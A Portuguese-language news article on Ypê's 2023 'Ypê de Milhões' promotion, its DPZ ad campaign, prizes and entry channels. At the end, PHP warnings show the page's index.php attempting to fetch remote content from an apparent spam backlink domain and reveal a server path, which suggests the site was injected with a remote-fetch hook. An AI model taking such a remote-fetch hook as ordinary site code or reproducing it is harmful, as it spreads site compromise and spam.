Por: A Tribuna
26/07/2023
11:07

Ypê, empresa 100% brasileira e uma das maiores fabricantes de produtos de higiene e limpeza do país, dá início a maior campanha de comunicação do ano com a promoção Ypê de Milhões! A campanha criada pela agência DPZ, reúne de forma inédita, artistas inusitados e de grande aproximação junto ao público, como o Tik Toker Xurrasco, a Carreta Furacão e o jornalista Marcio Canuto.  A campanha terá alcance nacional e será veiculada em TV aberta pela TV Globo, Record e SBT, além das mídias sociais Meta e TikTok..

“A promoção Ypê de Milhões é um momento de alto engajamento com nosso público, o que traz grande satisfação para nós. É a iniciativa do ano mais aguardada pelos consumidores, estimulando a experimentação de todo o portfólio da marca e a performance dos nossos produtos. Comenta César Nicolau, Diretor de Marketing da Ypê.

“Comunicar a volta de uma das promoções mais celebradas do país, que neste ano dá mais de 40 mil prêmios, pede senso de urgência. E senso de urgência não falta na campanha de “Ypê de Milhões”, que traz Márcio Canuto ligado no 220 para comandar um time de celebridades da internet, como Carreta Furacão e Xurrasco. Diversão e a certeza de que dá para ganhar: isso o público vai ter de sobra”, comenta Fabio Mozeli, Diretor Executivo de Criação da DPZ.

Prêmios

Pela primeira vez a Ypê oferecerá 2 milhões de reais para o ganhador final e mais de 40 mil prêmios instantâneos no valor de R$ 50,00 na hora, além de três carros.

Para participar da promoção, executada pela agência Bullet, basta comprar qualquer produto das marcas Ypê, Assolan, Atol, Perfex, Tixan Ypê, Flor de Ypê e Action Ypê, e cadastrar as notas fiscais no site www.promocaoype.com.br , que está no ar desde do dia 05/07 ou pelo WhatsApp (11) 3181-2644, mais um canal para facilitar a adesão dos consumidores.

A cada produto cadastrado, o consumidor tem três chances de ganhar. Os produtos Multiuso, Desinfetante e Água Sanitária Ypê dobram suas chances.

 


  Compartilhar

Assinar o Jornal



Identificação do Assinante


Digite nos campos abaixo o seu e-mail ou CPF de cadatro em nosso site e sua senha de acesso.


Esqueceu o seus dados? Fale com a gente!

Assinatura

Warning: file_get_contents(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/storage/f/d7/e0/at6/public_html/index.php on line 78

Warning: file_get_contents(https://kumpulkebobacklink.blog/api2.php): failed to open stream: no suitable wrapper could be found in /home/storage/f/d7/e0/at6/public_html/index.php on line 78